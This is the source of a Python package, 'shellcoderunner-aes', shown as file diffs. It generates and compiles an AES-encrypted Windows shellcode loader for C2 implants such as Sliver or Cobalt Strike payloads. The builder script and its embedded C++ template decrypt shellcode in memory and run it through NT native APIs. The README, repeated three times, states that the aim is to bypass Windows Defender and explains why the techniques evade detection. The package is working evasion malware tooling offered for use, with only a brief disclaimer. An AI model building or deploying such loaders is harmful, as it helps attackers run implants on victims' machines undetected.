shellcoderunner-aes 1.0.0__tar.gz

shellcoderunner_aes-1.0.0/LICENSE

@@ -0,0 +1,14 @@
+MIT License
+
+Copyright (c) 2026 PaiN05
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.

shellcoderunner_aes-1.0.0/PKG-INFO

@@ -0,0 +1,138 @@
+Metadata-Version: 2.4
+Name: shellcoderunner-aes
+Version: 1.0.0
+Summary: AES-based shellcode loader generator for Windows security research
+Author: PaiN05
+License: MIT
+Classifier: Programming Language :: Python :: 3
+Classifier: Topic :: Security
+Classifier: Intended Audience :: Developers
+Classifier: Intended Audience :: Information Technology
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: pycryptodome
+Dynamic: author
+Dynamic: classifier
+Dynamic: description
+Dynamic: description-content-type
+Dynamic: license
+Dynamic: license-file
+Dynamic: requires-dist
+Dynamic: summary
+
+# ShellcodeRunner (AES)
+
+## Overview
+
+**ShellcodeRunner** is a research-focused project designed to help security enthusiasts, red teamers, and malware researchers understand **how custom shellcode loaders work on Windows**.
+
+This repository demonstrates:
+
+* Encrypting raw shellcode using **AES**
+* Generating a **native C++ loader**
+* Executing shellcode fully **from memory**
+* Leveraging **NT Native APIs** for execution
+
+> **Primary Goal:**
+> To provide a practical idea of how shellcode loaders can be built in a way that can **easily bypass Windows Defender–based solutions** by avoiding static signatures, plaintext payloads, and common high-level APIs.
+
+This project is intended for **educational and defensive research purposes only**.
+
+---
+
+## Proof of Concept [Video]
+
+[![PoC Video](https://i9.ytimg.com/vi/xlK_TSLLuHA/mqdefault.jpg?sqp=CNT5jcsG-oaymwEmCMACELQB8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGEsgWyhlMA8=&rs=AOn4CLBZW3D_awnEWD14nexvk2pHm5QF_g)](https://www.youtube.com/watch?v=xlK_TSLLuHA) 
+
+---
+
+## Key Features
+
+* AES-128-CBC encrypted shellcode
+* Password-based key derivation (SHA-256)
+* No plaintext shellcode on disk
+* Native Windows CryptoAPI decryption
+* NTAPI-based memory allocation and execution
+* Simple and clean workflow
+
+---
+
+## Repository Structure
+
+```
+shellcoderunner/
+├── shellcoderunneraes.py   # Python builder (encrypts shellcode & generates C++ loader)
+├── aes_nt_runner.cpp       # Generated C++ loader
+├── meow.inc                # Encrypted shellcode + IV (auto-generated)
+└── runner.exe              # Final compiled executable
+```
+
+---
+
+## Installation
+
+Required Dependencies (Linux):
+```bash
+sudo apt update && sudo apt install -y python3 python3-pip mingw-w64
+python3 -m pip install pycryptodome
+```
+
+Clone the repository:
+
+```bash
+git clone https://github.com/jaytiwari05/shellcoderunner.git
+cd shellcoderunner
+```
+
+Make the script globally accessible:
+
+```bash
+cp shellcoderunneraes.py /usr/local/bin/shellcoderunneraes.py && chmod +x /usr/local/bin/shellcoderunneraes.py
+```
+
+---
+
+## Usage
+
+Generate and compile a shellcode loader using AES encryption:
+
+```bash
+shellcoderunneraes.py <C2_shellcode>.bin --aes pain05 --compile
+```
+
+### Arguments
+
+* `<C2_shellcode>.bin` — Raw shellcode file generated by a C2 framework (e.g., Sliver, Adaptix, Cobalt Strike).
+* `--aes` — Password used for AES key derivation
+* `--compile` — Compiles the generated C++ loader into an executable
+
+The final output will be a **standalone Windows executable** that decrypts and executes the shellcode entirely in memory.
+
+---
+
+## Why This Works Against Defender
+
+This project highlights techniques commonly used to bypass Windows Defender–based detection:
+
+* Encrypted payload stored on disk
+* Runtime decryption using legitimate Windows APIs
+* No RWX memory allocation
+* Execution via NT Native APIs
+* No use of high-level Win32 execution helpers
+
+These techniques help reduce static signatures and behavioral indicators commonly relied upon by Defender.
+
+---
+
+## Disclaimer
+
+This project is provided **strictly for educational, research, and defensive security purposes**.
+Do not use this code for unauthorized or malicious activities.
+The author is not responsible for misuse.
+
+---
+
+## Author
+
+**PaiN05**
+Security Research | Offensive Tradecraft | Malware Development Research

shellcoderunner_aes-1.0.0/README.md

@@ -0,0 +1,116 @@
+# ShellcodeRunner (AES)
+
+## Overview
+
+**ShellcodeRunner** is a research-focused project designed to help security enthusiasts, red teamers, and malware researchers understand **how custom shellcode loaders work on Windows**.
+
+This repository demonstrates:
+
+* Encrypting raw shellcode using **AES**
+* Generating a **native C++ loader**
+* Executing shellcode fully **from memory**
+* Leveraging **NT Native APIs** for execution
+
+> **Primary Goal:**
+> To provide a practical idea of how shellcode loaders can be built in a way that can **easily bypass Windows Defender–based solutions** by avoiding static signatures, plaintext payloads, and common high-level APIs.
+
+This project is intended for **educational and defensive research purposes only**.
+
+---
+
+## Proof of Concept [Video]
+
+[![PoC Video](https://i9.ytimg.com/vi/xlK_TSLLuHA/mqdefault.jpg?sqp=CNT5jcsG-oaymwEmCMACELQB8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGEsgWyhlMA8=&rs=AOn4CLBZW3D_awnEWD14nexvk2pHm5QF_g)](https://www.youtube.com/watch?v=xlK_TSLLuHA) 
+
+---
+
+## Key Features
+
+* AES-128-CBC encrypted shellcode
+* Password-based key derivation (SHA-256)
+* No plaintext shellcode on disk
+* Native Windows CryptoAPI decryption
+* NTAPI-based memory allocation and execution
+* Simple and clean workflow
+
+---
+
+## Repository Structure
+
+```
+shellcoderunner/
+├── shellcoderunneraes.py   # Python builder (encrypts shellcode & generates C++ loader)
+├── aes_nt_runner.cpp       # Generated C++ loader
+├── meow.inc                # Encrypted shellcode + IV (auto-generated)
+└── runner.exe              # Final compiled executable
+```
+
+---
+
+## Installation
+
+Required Dependencies (Linux):
+```bash
+sudo apt update && sudo apt install -y python3 python3-pip mingw-w64
+python3 -m pip install pycryptodome
+```
+
+Clone the repository:
+
+```bash
+git clone https://github.com/jaytiwari05/shellcoderunner.git
+cd shellcoderunner
+```
+
+Make the script globally accessible:
+
+```bash
+cp shellcoderunneraes.py /usr/local/bin/shellcoderunneraes.py && chmod +x /usr/local/bin/shellcoderunneraes.py
+```
+
+---
+
+## Usage
+
+Generate and compile a shellcode loader using AES encryption:
+
+```bash
+shellcoderunneraes.py <C2_shellcode>.bin --aes pain05 --compile
+```
+
+### Arguments
+
+* `<C2_shellcode>.bin` — Raw shellcode file generated by a C2 framework (e.g., Sliver, Adaptix, Cobalt Strike).
+* `--aes` — Password used for AES key derivation
+* `--compile` — Compiles the generated C++ loader into an executable
+
+The final output will be a **standalone Windows executable** that decrypts and executes the shellcode entirely in memory.
+
+---
+
+## Why This Works Against Defender
+
+This project highlights techniques commonly used to bypass Windows Defender–based detection:
+
+* Encrypted payload stored on disk
+* Runtime decryption using legitimate Windows APIs
+* No RWX memory allocation
+* Execution via NT Native APIs
+* No use of high-level Win32 execution helpers
+
+These techniques help reduce static signatures and behavioral indicators commonly relied upon by Defender.
+
+---
+
+## Disclaimer
+
+This project is provided **strictly for educational, research, and defensive security purposes**.
+Do not use this code for unauthorized or malicious activities.
+The author is not responsible for misuse.
+
+---
+
+## Author
+
+**PaiN05**
+Security Research | Offensive Tradecraft | Malware Development Research

shellcoderunner_aes-1.0.0/setup.cfg

@@ -0,0 +1,4 @@
+[egg_info]
+tag_build = 
+tag_date = 0
+

shellcoderunner_aes-1.0.0/setup.py

@@ -0,0 +1,24 @@
+from setuptools import setup
+
+setup(
+    name="shellcoderunner-aes",
+    version="1.0.0",
+    py_modules=["shellcoderunneraes"],
+    install_requires=["pycryptodome"],
+    entry_points={
+        "console_scripts": [
+            "shellcoderunneraes=shellcoderunneraes:main"
+        ]
+    },
+    author="PaiN05",
+    description="AES-based shellcode loader generator for Windows security research",
+    long_description=open("README.md").read(),
+    long_description_content_type="text/markdown",
+    license="MIT",
+    classifiers=[
+        "Programming Language :: Python :: 3",
+        "Topic :: Security",
+        "Intended Audience :: Developers",
+        "Intended Audience :: Information Technology",
+    ],
+)

shellcoderunner_aes-1.0.0/shellcoderunner_aes.egg-info/PKG-INFO

@@ -0,0 +1,138 @@
+Metadata-Version: 2.4
+Name: shellcoderunner-aes
+Version: 1.0.0
+Summary: AES-based shellcode loader generator for Windows security research
+Author: PaiN05
+License: MIT
+Classifier: Programming Language :: Python :: 3
+Classifier: Topic :: Security
+Classifier: Intended Audience :: Developers
+Classifier: Intended Audience :: Information Technology
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: pycryptodome
+Dynamic: author
+Dynamic: classifier
+Dynamic: description
+Dynamic: description-content-type
+Dynamic: license
+Dynamic: license-file
+Dynamic: requires-dist
+Dynamic: summary
+
+# ShellcodeRunner (AES)
+
+## Overview
+
+**ShellcodeRunner** is a research-focused project designed to help security enthusiasts, red teamers, and malware researchers understand **how custom shellcode loaders work on Windows**.
+
+This repository demonstrates:
+
+* Encrypting raw shellcode using **AES**
+* Generating a **native C++ loader**
+* Executing shellcode fully **from memory**
+* Leveraging **NT Native APIs** for execution
+
+> **Primary Goal:**
+> To provide a practical idea of how shellcode loaders can be built in a way that can **easily bypass Windows Defender–based solutions** by avoiding static signatures, plaintext payloads, and common high-level APIs.
+
+This project is intended for **educational and defensive research purposes only**.
+
+---
+
+## Proof of Concept [Video]
+
+[![PoC Video](https://i9.ytimg.com/vi/xlK_TSLLuHA/mqdefault.jpg?sqp=CNT5jcsG-oaymwEmCMACELQB8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGEsgWyhlMA8=&rs=AOn4CLBZW3D_awnEWD14nexvk2pHm5QF_g)](https://www.youtube.com/watch?v=xlK_TSLLuHA) 
+
+---
+
+## Key Features
+
+* AES-128-CBC encrypted shellcode
+* Password-based key derivation (SHA-256)
+* No plaintext shellcode on disk
+* Native Windows CryptoAPI decryption
+* NTAPI-based memory allocation and execution
+* Simple and clean workflow
+
+---
+
+## Repository Structure
+
+```
+shellcoderunner/
+├── shellcoderunneraes.py   # Python builder (encrypts shellcode & generates C++ loader)
+├── aes_nt_runner.cpp       # Generated C++ loader
+├── meow.inc                # Encrypted shellcode + IV (auto-generated)
+└── runner.exe              # Final compiled executable
+```
+
+---
+
+## Installation
+
+Required Dependencies (Linux):
+```bash
+sudo apt update && sudo apt install -y python3 python3-pip mingw-w64
+python3 -m pip install pycryptodome
+```
+
+Clone the repository:
+
+```bash
+git clone https://github.com/jaytiwari05/shellcoderunner.git
+cd shellcoderunner
+```
+
+Make the script globally accessible:
+
+```bash
+cp shellcoderunneraes.py /usr/local/bin/shellcoderunneraes.py && chmod +x /usr/local/bin/shellcoderunneraes.py
+```
+
+---
+
+## Usage
+
+Generate and compile a shellcode loader using AES encryption:
+
+```bash
+shellcoderunneraes.py <C2_shellcode>.bin --aes pain05 --compile
+```
+
+### Arguments
+
+* `<C2_shellcode>.bin` — Raw shellcode file generated by a C2 framework (e.g., Sliver, Adaptix, Cobalt Strike).
+* `--aes` — Password used for AES key derivation
+* `--compile` — Compiles the generated C++ loader into an executable
+
+The final output will be a **standalone Windows executable** that decrypts and executes the shellcode entirely in memory.
+
+---
+
+## Why This Works Against Defender
+
+This project highlights techniques commonly used to bypass Windows Defender–based detection:
+
+* Encrypted payload stored on disk
+* Runtime decryption using legitimate Windows APIs
+* No RWX memory allocation
+* Execution via NT Native APIs
+* No use of high-level Win32 execution helpers
+
+These techniques help reduce static signatures and behavioral indicators commonly relied upon by Defender.
+
+---
+
+## Disclaimer
+
+This project is provided **strictly for educational, research, and defensive security purposes**.
+Do not use this code for unauthorized or malicious activities.
+The author is not responsible for misuse.
+
+---
+
+## Author
+
+**PaiN05**
+Security Research | Offensive Tradecraft | Malware Development Research

shellcoderunner_aes-1.0.0/shellcoderunner_aes.egg-info/SOURCES.txt

@@ -0,0 +1,10 @@
+LICENSE
+README.md
+setup.py
+shellcoderunneraes.py
+shellcoderunner_aes.egg-info/PKG-INFO
+shellcoderunner_aes.egg-info/SOURCES.txt
+shellcoderunner_aes.egg-info/dependency_links.txt
+shellcoderunner_aes.egg-info/entry_points.txt
+shellcoderunner_aes.egg-info/requires.txt
+shellcoderunner_aes.egg-info/top_level.txt

shellcoderunner_aes-1.0.0/shellcoderunner_aes.egg-info/dependency_links.txt

@@ -0,0 +1 @@
+

shellcoderunner_aes-1.0.0/shellcoderunner_aes.egg-info/entry_points.txt

@@ -0,0 +1,2 @@
+[console_scripts]
+shellcoderunneraes = shellcoderunneraes:main

shellcoderunner_aes-1.0.0/shellcoderunner_aes.egg-info/requires.txt

@@ -0,0 +1 @@
+pycryptodome

shellcoderunner_aes-1.0.0/shellcoderunner_aes.egg-info/top_level.txt

@@ -0,0 +1 @@
+shellcoderunneraes

shellcoderunner_aes-1.0.0/shellcoderunneraes.py

@@ -0,0 +1,228 @@
+#!/usr/bin/env python3
+
+# Author : PaiN05
+# Shellcode Runner For CTF or some Red Teaming Engagements
+
+import argparse
+import subprocess
+import os
+import hashlib
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+
+
+CPP_FILE = "aes_nt_runner.cpp"
+INC_FILE = "meow.inc"
+EXE_FILE = "runner.exe" # Final OutPut File Name
+
+# KEY DERIVATION
+def derive_key_iv(password: str):
+    digest = hashlib.sha256(password.encode()).digest()
+    return digest[:16], digest[16:32]
+
+# C++ TEMPLATE 
+CPP_TEMPLATE = r'''
+#include <windows.h>
+#include <wincrypt.h>
+
+#pragma comment(lib, "advapi32.lib")
+
+typedef NTSTATUS(NTAPI* NtAllocateVirtualMemory_t)(
+    HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
+
+typedef NTSTATUS(NTAPI* NtProtectVirtualMemory_t)(
+    HANDLE, PVOID*, PSIZE_T, ULONG, PULONG);
+
+typedef NTSTATUS(NTAPI* NtCreateThreadEx_t)(
+    PHANDLE, ACCESS_MASK, PVOID, HANDLE, PVOID, PVOID,
+    ULONG, SIZE_T, SIZE_T, SIZE_T, PVOID);
+
+#include "meow.inc"
+
+unsigned char aes_key[16] = {
+    {AES_KEY}
+};
+
+bool AESDecrypt(
+    unsigned char* encrypted,
+    DWORD encLen,
+    unsigned char* key,
+    unsigned char* iv,
+    unsigned char** output,
+    DWORD* outLen)
+{
+    HCRYPTPROV hProv = 0;
+    HCRYPTKEY hKey = 0;
+
+    *output = new unsigned char[encLen];
+    memcpy(*output, encrypted, encLen);
+    *outLen = encLen;
+
+    if (!CryptAcquireContext(
+        &hProv, NULL, NULL,
+        PROV_RSA_AES, CRYPT_VERIFYCONTEXT))
+        return false;
+
+    struct {
+        BLOBHEADER hdr;
+        DWORD keyLen;
+        BYTE key[16];
+    } keyBlob;
+
+    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
+    keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
+    keyBlob.hdr.reserved = 0;
+    keyBlob.hdr.aiKeyAlg = CALG_AES_128;
+    keyBlob.keyLen = 16;
+    memcpy(keyBlob.key, key, 16);
+
+    if (!CryptImportKey(
+        hProv,
+        (BYTE*)&keyBlob,
+        sizeof(keyBlob),
+        0,
+        0,
+        &hKey))
+        return false;
+
+    CryptSetKeyParam(hKey, KP_IV, iv, 0);
+
+    if (!CryptDecrypt(
+        hKey,
+        0,
+        TRUE,
+        0,
+        *output,
+        outLen))
+        return false;
+
+    CryptDestroyKey(hKey);
+    CryptReleaseContext(hProv, 0);
+    return true;
+}
+
+int main()
+{
+    unsigned char* decrypted = nullptr;
+    DWORD decryptedLen = 0;
+
+    if (!AESDecrypt(
+        encrypted_shellcode,
+        encrypted_shellcode_len,
+        aes_key,
+        aes_iv,
+        &decrypted,
+        &decryptedLen))
+        return -1;
+
+    HMODULE ntdll = LoadLibraryA("ntdll.dll");
+
+    auto NtAllocateVirtualMemory =
+        (NtAllocateVirtualMemory_t)GetProcAddress(
+            ntdll, "NtAllocateVirtualMemory");
+
+    auto NtProtectVirtualMemory =
+        (NtProtectVirtualMemory_t)GetProcAddress(
+            ntdll, "NtProtectVirtualMemory");
+
+    auto NtCreateThreadEx =
+        (NtCreateThreadEx_t)GetProcAddress(
+            ntdll, "NtCreateThreadEx");
+
+    PVOID base = nullptr;
+    SIZE_T size = decryptedLen;
+
+    NtAllocateVirtualMemory(
+        (HANDLE)-1,
+        &base,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE);
+
+    memcpy(base, decrypted, decryptedLen);
+
+    ULONG oldProtect;
+    NtProtectVirtualMemory(
+        (HANDLE)-1,
+        &base,
+        &size,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    HANDLE hThread = NULL;
+    NtCreateThreadEx(
+        &hThread,
+        THREAD_ALL_ACCESS,
+        NULL,
+        (HANDLE)-1,
+        base,
+        NULL,
+        FALSE,
+        0, 0, 0, NULL);
+
+    WaitForSingleObject(hThread, INFINITE);
+    return 0;
+}
+'''
+
+# ENCRYPT + INC 
+def encrypt_shellcode(shellcode_path, password):
+    key, iv = derive_key_iv(password)
+
+    with open(shellcode_path, "rb") as f:
+        data = f.read()
+
+    cipher = AES.new(key, AES.MODE_CBC, iv)
+    encrypted = cipher.encrypt(pad(data, AES.block_size))
+
+    with open(INC_FILE, "w") as f:
+        f.write("unsigned char encrypted_shellcode[] = {\n")
+        for i in range(0, len(encrypted), 16):
+            chunk = ", ".join(f"0x{b:02x}" for b in encrypted[i:i+16])
+            f.write(f"    {chunk},\n")
+        f.write("};\n")
+        f.write(f"unsigned int encrypted_shellcode_len = {len(encrypted)};\n\n")
+
+        f.write("unsigned char aes_iv[] = {\n    ")
+        f.write(", ".join(f"0x{b:02x}" for b in iv))
+        f.write("\n};\n")
+
+    return key
+
+# WRITE CPP 
+def write_cpp(key_bytes):
+    key_str = ", ".join(f"0x{b:02x}" for b in key_bytes)
+    cpp_code = CPP_TEMPLATE.replace("{AES_KEY}", key_str)
+
+    with open(CPP_FILE, "w") as f:
+        f.write(cpp_code)
+
+# COMPILE 
+def compile_exe():
+    subprocess.run([
+        "x86_64-w64-mingw32-g++",
+        CPP_FILE,
+        "-o", EXE_FILE,
+        "-static",
+        "-ladvapi32"
+    ], check=True)
+
+# MAIN
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument("shellcode", help="shellcode.bin")
+    parser.add_argument("--aes", required=True, help="AES password")
+    parser.add_argument("--compile", action="store_true")
+    args = parser.parse_args()
+
+    key = encrypt_shellcode(args.shellcode, args.aes)
+    write_cpp(key)
+
+    if args.compile:
+        compile_exe()
+        os.remove(INC_FILE)
+        print(f"[+] Build complete: {EXE_FILE}")
+
+if __name__ == "__main__":
+    main()